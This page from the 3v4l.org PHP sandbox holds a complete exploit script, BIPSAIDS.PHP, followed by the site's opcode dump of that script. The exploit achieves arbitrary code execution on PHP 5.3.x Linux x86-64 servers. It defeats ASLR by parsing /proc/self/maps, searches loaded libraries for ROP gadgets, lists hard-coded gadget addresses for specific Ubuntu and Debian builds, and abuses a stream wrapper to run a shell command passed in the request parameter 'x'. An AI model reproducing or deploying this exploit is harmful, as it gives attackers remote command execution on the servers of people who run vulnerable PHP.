3v4l.org

run code in 300+ PHP versions simultaneously
<?php /* * BIPSAIDS.PHP -- by blasty <blasty@fail0verflow.com> * * PHP 5.3.x Linux x86-64 arbitrary code execution * * based on : MOPS-2010-001 (yes, bugs from 2010 live in <s>2011</s> 2012) * * NOTES: * Most distro's ship with PIE compiled httpd's these days, and everyone * seems to favour php5 as module rather than using php-cgi. This puts us * in an annoying position for doing Return-oriented-whatever. * * So the bad news is this exploit only works without restrictions against * machines that use php5-cgi and where gadgets have already been identified. * * However, the good news is if PHP doesn't enforce open_basedir restrictions * there's still a fat chance this exploit will succeed by parsing /proc/self/maps * to circumvent ASLR and identify gadgets during runtime by scanning libraries. * */ error_reporting(E_ALL); if (!isset($_REQUEST['x']) && !isset($argv[1])) die("gimme something to dance for\n"); $CMD = (isset($_REQUEST['x'])) ? $_REQUEST['x'] : $argv[1]; function ustruct($fmt, $data) { $out = array(); $pos = 0; $upack = array('u16'=>'S','u32'=>'V','u64'=>'V2'); $sizes = array('u16'=> 2 ,'u32'=> 4 ,'u64'=> 8 ); foreach($fmt as $name => $type) { $v = unpack($upack[$type], substr($data, $pos, $sizes[$type])); if ($type == 'u64') $v = ($v[2] << 32) | $v[1]; else $v = $v[1]; $out[$name] = $v; $pos += $sizes[$type]; } return $out; } function get_sections($filename) { $elf64_header = array( 'e_ident0' => 'u64', 'e_ident1' => 'u64', 'type' => 'u16', 'machine' => 'u16', 'version' => 'u32', 'entry' => 'u64', 'phoff' => 'u64', 'shoff' => 'u64', 'flags' => 'u32', 'ehsize' => 'u16', 'phentsize' => 'u16', 'phnum' => 'u16', 'shentsize' => 'u16', 'shnum' => 'u16', 'shstrndx' => 'u16' ); $elf64_sh = array( 'name' => 'u32', 'type' => 'u32', 'flags' => 'u64', 'addr' => 'u64', 'offset' => 'u64', 'size' => 'u64', 'link' => 'u32', 'info' => 'u32', 'align' => 'u64', 'entsize'=> 'u64' ); $buf = file_get_contents($filename); $hdr = ustruct($elf64_header, substr($buf, 0, 0x40)); echo "[>>] $filename\n"; $sections = array(); for($i = 0; $i < $hdr['shnum']; $i++) { $data = substr($buf, $hdr['shoff'] + ($i * $hdr['shentsize']), $hdr['shentsize']); $sections[] = ustruct($elf64_sh, $data); } $str_section = $sections[ $hdr['shstrndx'] ]; $ret_sections = array(); for($i = 0; $i < count($sections); $i++) { if (!($sections[$i]['flags']&4)) continue; $v = explode("\x00", substr($buf, $str_section['offset'] + $sections[$i]['name']) ); $sections[$i]['str'] = $v[0]; $sections[$i]['data'] = substr($buf, $sections[$i]['offset'], $sections[$i]['size']); $ret_sections[] = $sections[$i]; } return $ret_sections; } function find_gadgets($gg, $data, $base=0) { $ret = array(); foreach($gg as $name => $patterns) { if (!is_array($patterns)) $patterns = array($patterns); foreach($patterns as $pattern) { if (($pos = strpos($data, $pattern)) !== false) { $ret[$name] = $base+$pos; } } } return $ret; } function w64($v) { return pack("V", $v & 0xffffffff) . pack("V", $v >> 32); } $resolve = true; if ( ((isset($_SERVER['ORIG_SCRIPT_NAME']) && strstr($_SERVER['ORIG_SCRIPT_NAME'], "cgi") !== false) || (isset($_SERVER['ORIG_SCRIPT_FILENAME']) && strstr($_SERVER['ORIG_SCRIPT_FILENAME'], "cgi") !== false)) ) { $resolve = false; $cgirop = array( "5.3.2-1ubuntu4.10" => array(0x42c1b8, 0x42fd31, 0x42c59d, 0x65ca2b, 0x5f0758, 0x53c720, 0xd6a830, 0x096a20), "5.3.5-1ubuntu7.3" => array(0x429d4f, 0x42f3e1, 0x428c26, 0x50b22d, 0x5f0758, 0x6b1730, 0xdae7d0, 0x095260), "5.3.3-7+squeeze3" => array(0x42d478, 0x4310c1, 0x42d85d, 0x648bdb, 0x5dc538, 0x527600, 0xd5b810, 0x084970), //"5.3.8" /* ARCH */ => array(0x42544c, 0x4294ba, 0x42460b, 0x428f57, 0x427859, 0x423476, ); $v = phpversion(); if (!isset($cgirop[$v])) { echo "plz2portgadgets: ".$v."\nattempting fallback!\n"; $resolve = true; } else $addy = $cgirop[$v]; } if (!isset($addy)) { $patterns = array( 'ADDRSP' => "\x48\x83\xc4\x28\xc3", 'POPRAX' => "\x58\xc3", 'LEACALL' => array( "\x48\x8d\x7c\x24\x10\xff\xd0", "\x48\x8d\x7c\x24\x18\xff\xe0" ), 'SYSTEM' => "\x53\x48\x83\xec\x10\x48\x85\xff\x74\x16" ); $maps = explode("\n", file_get_contents("/proc/self/maps") ); $gadgets = array(); foreach($maps as $map) { $map = explode(" ", preg_replace('!\s+!', ' ', $map)); if (count($map)<2 || !strstr($map[1], "x") || $map[5][0] == '[') continue; if (count($patterns) == 1 && !strstr($map[5], "libc")) continue; $exec_sections = get_sections($map[5]); $tmp = explode("-", $map[0]); $page_offs = hexdec($tmp[0]); foreach($exec_sections as $section) { $new_gadgets = find_gadgets( $patterns, $section['data'], $section['offset'] ); foreach($new_gadgets as $name => $offs) { if (isset($patterns[$name])) { printf(" `- found gadget '%s' in [%s -> %s] @ 0x%x\n", $name, $map[5], $section['str'], $page_offs+$offs); unset($patterns[$name]); $new_gadgets[$name] += $page_offs; } } if (count($new_gadgets) > 0) $gadgets = array_merge($gadgets, $new_gadgets); if (count($patterns) == 0) { echo "!!! ALL GADGETS FOUND, LETS-A-GO !!!\n"; break 2; } } } $addy = $gadgets; } if (isset($gadgets)) { $ropvar = array('ADDRSP','POPRAX','LEACALL','SYSTEM'); for($i = 0; $i < count($ropvar); $i++) { printf("setting %s to 0x%x\n", $ropvar[$i], $addy[ $ropvar[$i] ]); $$ropvar[$i] = w64($addy[ $ropvar[$i] ]); } } else { $ropvar = array('ADDRSP','POPRAX','POPRDI','DEREFRAX','SUBRDIRAX','LEACALL','GOTENTRY','LIBCDELTA'); for($i = 0; $i < count($ropvar); $i++) { printf("setting %s to 0x%x\n", $ropvar[$i], $addy[ $i ]); $$ropvar[$i] = w64($addy[ $i ]); } } if (!isset($addy) || count($addy) != count($ropvar)) die("looks like this tech isn't compatible with your box.\n"); class evil_stream { function stream_open($a, $b, $c, &$e) { return 1; } function stream_eof() { return 0; } function stream_seek($offset, $whence) { return 0; } function stream_read($count) { global $ADDRSP, $POPRAX, $GOTENTRY, $DEREFRAX, $POPRDI, $LIBCDELTA, $SUBRDIRAX, $LEACALL, $CMD, $SYSTEM; hash_final($GLOBALS['hid'], false); $GLOBALS['a'] = str_repeat($ADDRSP, 3); // add 40, rsp if (isset($SYSTEM) && !empty($SYSTEM)) return $POPRAX . $SYSTEM . $LEACALL . str_repeat("Z", 0x58) . "WOOP ; " . $CMD . "\x00"; else return $POPRAX . $GOTENTRY . $DEREFRAX . $POPRDI . $LIBCDELTA . $SUBRDIRAX . $LEACALL . str_repeat("Z", 0x58) . "WOOP ; " . $CMD . " ; echo lol\x00"; } } stream_wrapper_register("evil", "evil_stream") || die("oh snap :(\n"); $hid = hash_init('md5'); hash_update_file($hid, "evil://code"); echo "you goofed up\n"; ?>
Finding entry points
Branch analysis from position: 0
2 jumps found. (Code = 46) Position 1 = 7, Position 2 = 10
Branch analysis from position: 7
2 jumps found. (Code = 43) Position 1 = 11, Position 2 = 12
Branch analysis from position: 11
1 jumps found. (Code = 79) Position 1 = -2
Branch analysis from position: 12
2 jumps found. (Code = 43) Position 1 = 15, Position 2 = 19
Branch analysis from position: 15
1 jumps found. (Code = 42) Position 1 = 21
Branch analysis from position: 21
2 jumps found. (Code = 46) Position 1 = 26, Position 2 = 34
Branch analysis from position: 26
2 jumps found. (Code = 47) Position 1 = 35, Position 2 = 47
Branch analysis from position: 35
2 jumps found. (Code = 46) Position 1 = 38, Position 2 = 46
Branch analysis from position: 38
2 jumps found. (Code = 43) Position 1 = 48, Position 2 = 63
Branch analysis from position: 48
2 jumps found. (Code = 43) Position 1 = 56, Position 2 = 61
Branch analysis from position: 56
1 jumps found. (Code = 42) Position 1 = 63
Branch analysis from position: 63
2 jumps found. (Code = 43) Position 1 = 66, Position 2 = 182
Branch analysis from position: 66
2 jumps found. (Code = 77) Position 1 = 77, Position 2 = 180
Branch analysis from position: 77
2 jumps found. (Code = 78) Position 1 = 78, Position 2 = 180
Branch analysis from position: 78
2 jumps found. (Code = 47) Position 1 = 91, Position 2 = 98
Branch analysis from position: 91
2 jumps found. (Code = 47) Position 1 = 99, Position 2 = 103
Branch analysis from position: 99
2 jumps found. (Code = 43) Position 1 = 104, Position 2 = 105
Branch analysis from position: 104
1 jumps found. (Code = 42) Position 1 = 77
Branch analysis from position: 77
Branch analysis from position: 105
2 jumps found. (Code = 46) Position 1 = 108, Position 2 = 115
Branch analysis from position: 108
2 jumps found. (Code = 43) Position 1 = 116, Position 2 = 117
Branch analysis from position: 116
1 jumps found. (Code = 42) Position 1 = 77
Branch analysis from position: 77
Branch analysis from position: 117
2 jumps found. (Code = 77) Position 1 = 134, Position 2 = 178
Branch analysis from position: 134
2 jumps found. (Code = 78) Position 1 = 135, Position 2 = 178
Branch analysis from position: 135
2 jumps found. (Code = 77) Position 1 = 144, Position 2 = 162
Branch analysis from position: 144
2 jumps found. (Code = 78) Position 1 = 145, Position 2 = 162
Branch analysis from position: 145
2 jumps found. (Code = 43) Position 1 = 148, Position 2 = 161
Branch analysis from position: 148
1 jumps found. (Code = 42) Position 1 = 144
Branch analysis from position: 144
Branch analysis from position: 161
Branch analysis from position: 162
2 jumps found. (Code = 43) Position 1 = 166, Position 2 = 171
Branch analysis from position: 166
2 jumps found. (Code = 43) Position 1 = 174, Position 2 = 177
Branch analysis from position: 174
1 jumps found. (Code = 42) Position 1 = 180
Branch analysis from position: 180
2 jumps found. (Code = 43) Position 1 = 184, Position 2 = 208
Branch analysis from position: 184
1 jumps found. (Code = 42) Position 1 = 204
Branch analysis from position: 204
2 jumps found. (Code = 44) Position 1 = 207, Position 2 = 187
Branch analysis from position: 207
1 jumps found. (Code = 42) Position 1 = 229
Branch analysis from position: 229
2 jumps found. (Code = 47) Position 1 = 232, Position 2 = 236
Branch analysis from position: 232
2 jumps found. (Code = 43) Position 1 = 237, Position 2 = 238
Branch analysis from position: 237
1 jumps found. (Code = 79) Position 1 = -2
Branch analysis from position: 238
2 jumps found. (Code = 47) Position 1 = 243, Position 2 = 245
Branch analysis from position: 243
1 jumps found. (Code = 79) Position 1 = -2
Branch analysis from position: 245
1 jumps found. (Code = 62) Position 1 = -2
Branch analysis from position: 236
Branch analysis from position: 187
2 jumps found. (Code = 44) Position 1 = 207, Position 2 = 187
Branch analysis from position: 207
Branch analysis from position: 187
Branch analysis from position: 208
1 jumps found. (Code = 42) Position 1 = 226
Branch analysis from position: 226
2 jumps found. (Code = 44) Position 1 = 229, Position 2 = 211
Branch analysis from position: 229
Branch analysis from position: 211
2 jumps found. (Code = 44) Position 1 = 229, Position 2 = 211
Branch analysis from position: 229
Branch analysis from position: 211
Branch analysis from position: 177
1 jumps found. (Code = 42) Position 1 = 134
Branch analysis from position: 134
Branch analysis from position: 171
Branch analysis from position: 162
Branch analysis from position: 178
1 jumps found. (Code = 42) Position 1 = 77
Branch analysis from position: 77
Branch analysis from position: 178
Branch analysis from position: 115
Branch analysis from position: 103
Branch analysis from position: 98
Branch analysis from position: 180
Branch analysis from position: 180
Branch analysis from position: 182
Branch analysis from position: 61
2 jumps found. (Code = 43) Position 1 = 66, Position 2 = 182
Branch analysis from position: 66
Branch analysis from position: 182
Branch analysis from position: 63
Branch analysis from position: 46
Branch analysis from position: 47
Branch analysis from position: 34
Branch analysis from position: 19
2 jumps found. (Code = 46) Position 1 = 26, Position 2 = 34
Branch analysis from position: 26
Branch analysis from position: 34
Branch analysis from position: 10
filename:       /in/Xtt4P
function name:  (null)
number of ops:  255
compiled vars:  !0 = $argv, !1 = $CMD, !2 = $resolve, !3 = $cgirop, !4 = $v, !5 = $addy, !6 = $patterns, !7 = $maps, !8 = $gadgets, !9 = $map, !10 = $exec_sections, !11 = $tmp, !12 = $page_offs, !13 = $section, !14 = $new_gadgets, !15 = $offs, !16 = $name, !17 = $ropvar, !18 = $i, !19 = $hid
line      #* E I O op                           fetch          ext  return  operands
-------------------------------------------------------------------------------------
   22     0  E >   INIT_FCALL                                               'error_reporting'
          1        SEND_VAL                                                 32767
          2        DO_ICALL                                                 
   24     3        FETCH_IS                                         ~21     '_REQUEST'
          4        ISSET_ISEMPTY_DIM_OBJ                         0  ~22     ~21, 'x'
          5        BOOL_NOT                                         ~23     ~22
          6      > JMPZ_EX                                          ~23     ~23, ->10
          7    >   ISSET_ISEMPTY_DIM_OBJ                         0  ~24     !0, 1
          8        BOOL_NOT                                         ~25     ~24
          9        BOOL                                             ~23     ~25
         10    > > JMPZ                                                     ~23, ->12
   25    11    > > EXIT                                                     'gimme+something+to+dance+for%0A'
   27    12    >   FETCH_IS                                         ~26     '_REQUEST'
         13        ISSET_ISEMPTY_DIM_OBJ                         0          ~26, 'x'
         14      > JMPZ                                                     ~27, ->19
         15    >   FETCH_R                      global              ~28     '_REQUEST'
         16        FETCH_DIM_R                                      ~29     ~28, 'x'
         17        QM_ASSIGN                                        ~30     ~29
         18      > JMP                                                      ->21
         19    >   FETCH_DIM_R                                      ~31     !0, 1
         20        QM_ASSIGN                                        ~30     ~31
         21    >   ASSIGN                                                   !1, ~30
  110    22        ASSIGN                                                   !2, <true>
  113    23        FETCH_IS                                         ~34     '_SERVER'
         24        ISSET_ISEMPTY_DIM_OBJ                         0  ~35     ~34, 'ORIG_SCRIPT_NAME'
         25      > JMPZ_EX                                          ~35     ~35, ->34
         26    >   INIT_FCALL                                               'strstr'
         27        FETCH_R                      global              ~36     '_SERVER'
         28        FETCH_DIM_R                                      ~37     ~36, 'ORIG_SCRIPT_NAME'
         29        SEND_VAL                                                 ~37
         30        SEND_VAL                                                 'cgi'
         31        DO_ICALL                                         $38     
         32        TYPE_CHECK                                  1018  ~39     $38
         33        BOOL                                             ~35     ~39
         34    > > JMPNZ_EX                                         ~35     ~35, ->47
  114    35    >   FETCH_IS                                         ~40     '_SERVER'
         36        ISSET_ISEMPTY_DIM_OBJ                         0  ~41     ~40, 'ORIG_SCRIPT_FILENAME'
         37      > JMPZ_EX                                          ~41     ~41, ->46
         38    >   INIT_FCALL                                               'strstr'
         39        FETCH_R                      global              ~42     '_SERVER'
         40        FETCH_DIM_R                                      ~43     ~42, 'ORIG_SCRIPT_FILENAME'
         41        SEND_VAL                                                 ~43
         42        SEND_VAL                                                 'cgi'
         43        DO_ICALL                                         $44     
         44        TYPE_CHECK                                  1018  ~45     $44
         45        BOOL                                             ~41     ~45
         46    >   BOOL                                             ~35     ~41
         47    > > JMPZ                                                     ~35, ->63
  116    48    >   ASSIGN                                                   !2, <false>
  118    49        ASSIGN                                                   !3, <array>
  125    50        INIT_FCALL                                               'phpversion'
         51        DO_ICALL                                         $48     
         52        ASSIGN                                                   !4, $48
  126    53        ISSET_ISEMPTY_DIM_OBJ                         0  ~50     !3, !4
         54        BOOL_NOT                                         ~51     ~50
         55      > JMPZ                                                     ~51, ->61
  127    56    >   CONCAT                                           ~52     'plz2portgadgets%3A+', !4
         57        CONCAT                                           ~53     ~52, '%0Aattempting+fallback%21%0A'
         58        ECHO                                                     ~53
  128    59        ASSIGN                                                   !2, <true>
         60      > JMP                                                      ->63
  130    61    >   FETCH_DIM_R                                      ~55     !3, !4
         62        ASSIGN                                                   !5, ~55
  133    63    >   ISSET_ISEMPTY_CV                                 ~57     !5
         64        BOOL_NOT                                         ~58     ~57
         65      > JMPZ                                                     ~58, ->182
  134    66    >   ASSIGN                                                   !6, <array>
  144    67        INIT_FCALL                                               'explode'
         68        SEND_VAL                                                 '%0A'
  145    69        INIT_FCALL                                               'file_get_contents'
         70        SEND_VAL                                                 '%2Fproc%2Fself%2Fmaps'
         71        DO_ICALL                                         $60     
         72        SEND_VAR                                                 $60
         73        DO_ICALL                                         $61     
  144    74        ASSIGN                                                   !7, $61
  147    75        ASSIGN                                                   !8, <array>
  148    76      > FE_RESET_R                                       $64     !7, ->180
         77    > > FE_FETCH_R                                               $64, !9, ->180
  149    78    >   INIT_FCALL                                               'explode'
         79        SEND_VAL                                                 '+'
         80        INIT_FCALL                                               'preg_replace'
         81        SEND_VAL                                                 '%21%5Cs%2B%21'
         82        SEND_VAL                                                 '+'
         83        SEND_VAR                                                 !9
         84        DO_ICALL                                         $65     
         85        SEND_VAR                                                 $65
         86        DO_ICALL                                         $66     
         87        ASSIGN                                                   !9, $66
  150    88        COUNT                                            ~68     !9
         89        IS_SMALLER                                       ~69     ~68, 2
         90      > JMPNZ_EX                                         ~69     ~69, ->98
         91    >   INIT_FCALL                                               'strstr'
         92        FETCH_DIM_R                                      ~70     !9, 1
         93        SEND_VAL                                                 ~70
         94        SEND_VAL                                                 'x'
         95        DO_ICALL                                         $71     
         96        BOOL_NOT                                         ~72     $71
         97        BOOL                                             ~69     ~72
         98    > > JMPNZ_EX                                         ~69     ~69, ->103
         99    >   FETCH_DIM_R                                      ~73     !9, 5
        100        FETCH_DIM_R                                      ~74     ~73, 0
        101        IS_EQUAL                                         ~75     ~74, '%5B'
        102        BOOL                                             ~69     ~75
        103    > > JMPZ                                                     ~69, ->105
  151   104    > > JMP                                                      ->77
  152   105    >   COUNT                                            ~76     !6
        106        IS_EQUAL                                         ~77     ~76, 1
        107      > JMPZ_EX                                          ~77     ~77, ->115
        108    >   INIT_FCALL                                               'strstr'
        109        FETCH_DIM_R                                      ~78     !9, 5
        110        SEND_VAL                                                 ~78
        111        SEND_VAL                                                 'libc'
        112        DO_ICALL                                         $79     
        113        BOOL_NOT                                         ~80     $79
        114        BOOL                                             ~77     ~80
        115    > > JMPZ                                                     ~77, ->117
  153   116    > > JMP                                                      ->77
  154   117    >   INIT_FCALL                                               'get_sections'
        118        FETCH_DIM_R                                      ~81     !9, 5
        119        SEND_VAL                                                 ~81
        120        DO_FCALL                                      0  $82     
        121        ASSIGN                                                   !10, $82
  156   122        INIT_FCALL                                               'explode'
        123        SEND_VAL                                                 '-'
        124        FETCH_DIM_R                                      ~84     !9, 0
        125        SEND_VAL                                                 ~84
        126        DO_ICALL                                         $85     
        127        ASSIGN                                                   !11, $85
  157   128        INIT_FCALL                                               'hexdec'
        129        FETCH_DIM_R                                      ~87     !11, 0
        130        SEND_VAL                                                 ~87
        131        DO_ICALL                                         $88     
        132        ASSIGN                                                   !12, $88
  159   133      > FE_RESET_R                                       $90     !10, ->178
        134    > > FE_FETCH_R                                               $90, !13, ->178
  160   135    >   INIT_FCALL                                               'find_gadgets'
  161   136        SEND_VAR                                                 !6
        137        FETCH_DIM_R                                      ~91     !13, 'data'
        138        SEND_VAL                                                 ~91
        139        FETCH_DIM_R                                      ~92     !13, 'offset'
        140        SEND_VAL                                                 ~92
        141        DO_FCALL                                      0  $93     
  160   142        ASSIGN                                                   !14, $93
  163   143      > FE_RESET_R                                       $95     !14, ->162
        144    > > FE_FETCH_R                                       ~96     $95, !15, ->162
        145    >   ASSIGN                                                   !16, ~96
  164   146        ISSET_ISEMPTY_DIM_OBJ                         0          !6, !16
        147      > JMPZ                                                     ~98, ->161
  165   148    >   INIT_FCALL                                               'printf'
        149        SEND_VAL                                                 '++%60-+found+gadget+%27%25s%27+in+%5B%25s+-%3E+%25s%5D+%40+0x%25x%0A'
        150        SEND_VAR                                                 !16
        151        FETCH_DIM_R                                      ~99     !9, 5
        152        SEND_VAL                                                 ~99
        153        FETCH_DIM_R                                      ~100    !13, 'str'
        154        SEND_VAL                                                 ~100
        155        ADD                                              ~101    !12, !15
        156        SEND_VAL                                                 ~101
        157        DO_ICALL                                                 
  166   158        UNSET_DIM                                                !6, !16
  167   159        ASSIGN_DIM_OP                +=               1          !14, !16
        160        OP_DATA                                                  !12
  163   161    > > JMP                                                      ->144
        162    >   FE_FREE                                                  $95
  170   163        COUNT                                            ~104    !14
        164        IS_SMALLER                                               0, ~104
        165      > JMPZ                                                     ~105, ->171
  171   166    >   INIT_FCALL                                               'array_merge'
        167        SEND_VAR                                                 !8
        168        SEND_VAR                                                 !14
        169        DO_ICALL                                         $106    
        170        ASSIGN                                                   !8, $106
  172   171    >   COUNT                                            ~108    !6
        172        IS_EQUAL                                                 ~108, 0
        173      > JMPZ                                                     ~109, ->177
  173   174    >   ECHO                                                     '%21%21%21+ALL+GADGETS+FOUND%2C+LETS-A-GO+%21%21%21%0A'
  174   175        FE_FREE                                                  $90
        176      > JMP                                                      ->180
  159   177    > > JMP                                                      ->134
        178    >   FE_FREE                                                  $90
  148   179      > JMP                                                      ->77
        180    >   FE_FREE                                                  $64
  178   181        ASSIGN                                                   !5, !8
  180   182    >   ISSET_ISEMPTY_CV                                         !8
        183      > JMPZ                                                     ~111, ->208
  181   184    >   ASSIGN                                                   !17, <array>
  182   185        ASSIGN                                                   !18, 0
        186      > JMP                                                      ->204
  183   187    >   INIT_FCALL                                               'printf'
        188        SEND_VAL                                                 'setting+%25s+to+0x%25x%0A'
        189        FETCH_DIM_R                                      ~114    !17, !18
        190        SEND_VAL                                                 ~114
        191        FETCH_DIM_R                                      ~115    !17, !18
        192        FETCH_DIM_R                                      ~116    !5, ~115
        193        SEND_VAL                                                 ~116
        194        DO_ICALL                                                 
  184   195        INIT_FCALL                                               'w64'
        196        FETCH_DIM_R                                      ~120    !17, !18
        197        FETCH_DIM_R                                      ~121    !5, ~120
        198        SEND_VAL                                                 ~121
        199        DO_FCALL                                      0  $122    
        200        FETCH_W                      local               $118    !17
        201        ASSIGN_DIM                                               $118, !18
        202        OP_DATA                                                  $122
  182   203        PRE_INC                                                  !18
        204    >   COUNT                                            ~124    !17
        205        IS_SMALLER                                               !18, ~124
        206      > JMPNZ                                                    ~125, ->187
        207    > > JMP                                                      ->229
  187   208    >   ASSIGN                                                   !17, <array>
  189   209        ASSIGN                                                   !18, 0
        210      > JMP                                                      ->226
  190   211    >   INIT_FCALL                                               'printf'
        212        SEND_VAL                                                 'setting+%25s+to+0x%25x%0A'
        213        FETCH_DIM_R                                      ~128    !17, !18
        214        SEND_VAL                                                 ~128
        215        FETCH_DIM_R                                      ~129    !5, !18
        216        SEND_VAL                                                 ~129
        217        DO_ICALL                                                 
  191   218        INIT_FCALL                                               'w64'
        219        FETCH_DIM_R                                      ~133    !5, !18
        220        SEND_VAL                                                 ~133
        221        DO_FCALL                                      0  $134    
        222        FETCH_W                      local               $131    !17
        223        ASSIGN_DIM                                               $131, !18
        224        OP_DATA                                                  $134
  189   225        PRE_INC                                                  !18
        226    >   COUNT                                            ~136    !17
        227        IS_SMALLER                                               !18, ~136
        228      > JMPNZ                                                    ~137, ->211
  195   229    >   ISSET_ISEMPTY_CV                                 ~138    !5
        230        BOOL_NOT                                         ~139    ~138
        231      > JMPNZ_EX                                         ~139    ~139, ->236
        232    >   COUNT                                            ~140    !5
        233        COUNT                                            ~141    !17
        234        IS_NOT_EQUAL                                     ~142    ~140, ~141
        235        BOOL                                             ~139    ~142
        236    > > JMPZ                                                     ~139, ->238
  196   237    > > EXIT                                                     'looks+like+this+tech+isn%27t+compatible+with+your+box.%0A'
  225   238    >   INIT_FCALL                                               'stream_wrapper_register'
        239        SEND_VAL                                                 'evil'
        240        SEND_VAL                                                 'evil_stream'
        241        DO_ICALL                                         $143    
        242      > JMPNZ_EX                                         ~144    $143, ->245
        243    > > EXIT                                                     'oh+snap+%3A%28%0A'
        244*       BOOL                                             ~144    <true>
  226   245    >   INIT_FCALL                                               'hash_init'
        246        SEND_VAL                                                 'md5'
        247        DO_ICALL                                         $145    
        248        ASSIGN                                                   !19, $145
  227   249        INIT_FCALL                                               'hash_update_file'
        250        SEND_VAR                                                 !19
        251        SEND_VAL                                                 'evil%3A%2F%2Fcode'
        252        DO_ICALL                                                 
  228   253        ECHO                                                     'you+goofed+up%0A'
  229   254      > RETURN                                                   1

Function ustruct:
Finding entry points
Branch analysis from position: 0
2 jumps found. (Code = 77) Position 1 = 7, Position 2 = 36
Branch analysis from position: 7
2 jumps found. (Code = 78) Position 1 = 8, Position 2 = 36
Branch analysis from position: 8
2 jumps found. (Code = 43) Position 1 = 23, Position 2 = 29
Branch analysis from position: 23
1 jumps found. (Code = 42) Position 1 = 31
Branch analysis from position: 31
1 jumps found. (Code = 42) Position 1 = 7
Branch analysis from position: 7
Branch analysis from position: 29
1 jumps found. (Code = 42) Position 1 = 7
Branch analysis from position: 7
Branch analysis from position: 36
1 jumps found. (Code = 62) Position 1 = -2
Branch analysis from position: 36
filename:       /in/Xtt4P
function name:  ustruct
number of ops:  39
compiled vars:  !0 = $fmt, !1 = $data, !2 = $out, !3 = $pos, !4 = $upack, !5 = $sizes, !6 = $type, !7 = $name, !8 = $v
line      #* E I O op                           fetch          ext  return  operands
-------------------------------------------------------------------------------------
   29     0  E >   RECV                                             !0      
          1        RECV                                             !1      
   30     2        ASSIGN                                                   !2, <array>
   31     3        ASSIGN                                                   !3, 0
   32     4        ASSIGN                                                   !4, <array>
   33     5        ASSIGN                                                   !5, <array>
   35     6      > FE_RESET_R                                       $13     !0, ->36
          7    > > FE_FETCH_R                                       ~14     $13, !6, ->36
          8    >   ASSIGN                                                   !7, ~14
   36     9        INIT_FCALL                                               'unpack'
         10        FETCH_DIM_R                                      ~16     !4, !6
         11        SEND_VAL                                                 ~16
         12        INIT_FCALL                                               'substr'
         13        SEND_VAR                                                 !1
         14        SEND_VAR                                                 !3
         15        FETCH_DIM_R                                      ~17     !5, !6
         16        SEND_VAL                                                 ~17
         17        DO_ICALL                                         $18     
         18        SEND_VAR                                                 $18
         19        DO_ICALL                                         $19     
         20        ASSIGN                                                   !8, $19
   37    21        IS_EQUAL                                                 !6, 'u64'
         22      > JMPZ                                                     ~21, ->29
   38    23    >   FETCH_DIM_R                                      ~22     !8, 2
         24        SL                                               ~23     ~22, 32
         25        FETCH_DIM_R                                      ~24     !8, 1
         26        BW_OR                                            ~25     ~23, ~24
         27        ASSIGN                                                   !8, ~25
         28      > JMP                                                      ->31
   40    29    >   FETCH_DIM_R                                      ~27     !8, 1
         30        ASSIGN                                                   !8, ~27
   41    31    >   ASSIGN_DIM                                               !2, !7
         32        OP_DATA                                                  !8
   42    33        FETCH_DIM_R                                      ~30     !5, !6
         34        ASSIGN_OP                                     1          !3, ~30
   35    35      > JMP                                                      ->7
         36    >   FE_FREE                                                  $13
   44    37      > RETURN                                                   !2
   45    38*     > RETURN                                                   null

End of function ustruct

Function get_sections:
Finding entry points
Branch analysis from position: 0
1 jumps found. (Code = 42) Position 1 = 42
Branch analysis from position: 42
2 jumps found. (Code = 44) Position 1 = 45, Position 2 = 24
Branch analysis from position: 45
1 jumps found. (Code = 42) Position 1 = 90
Branch analysis from position: 90
2 jumps found. (Code = 44) Position 1 = 93, Position 2 = 51
Branch analysis from position: 93
1 jumps found. (Code = 62) Position 1 = -2
Branch analysis from position: 51
2 jumps found. (Code = 43) Position 1 = 56, Position 2 = 57
Branch analysis from position: 56
1 jumps found. (Code = 42) Position 1 = 89
Branch analysis from position: 89
2 jumps found. (Code = 44) Position 1 = 93, Position 2 = 51
Branch analysis from position: 93
Branch analysis from position: 51
Branch analysis from position: 57
2 jumps found. (Code = 44) Position 1 = 93, Position 2 = 51
Branch analysis from position: 93

Generated using Vulcan Logic Dumper, using php 8.0.0

preferences:
155.68 ms | 1431 KiB | 45 Q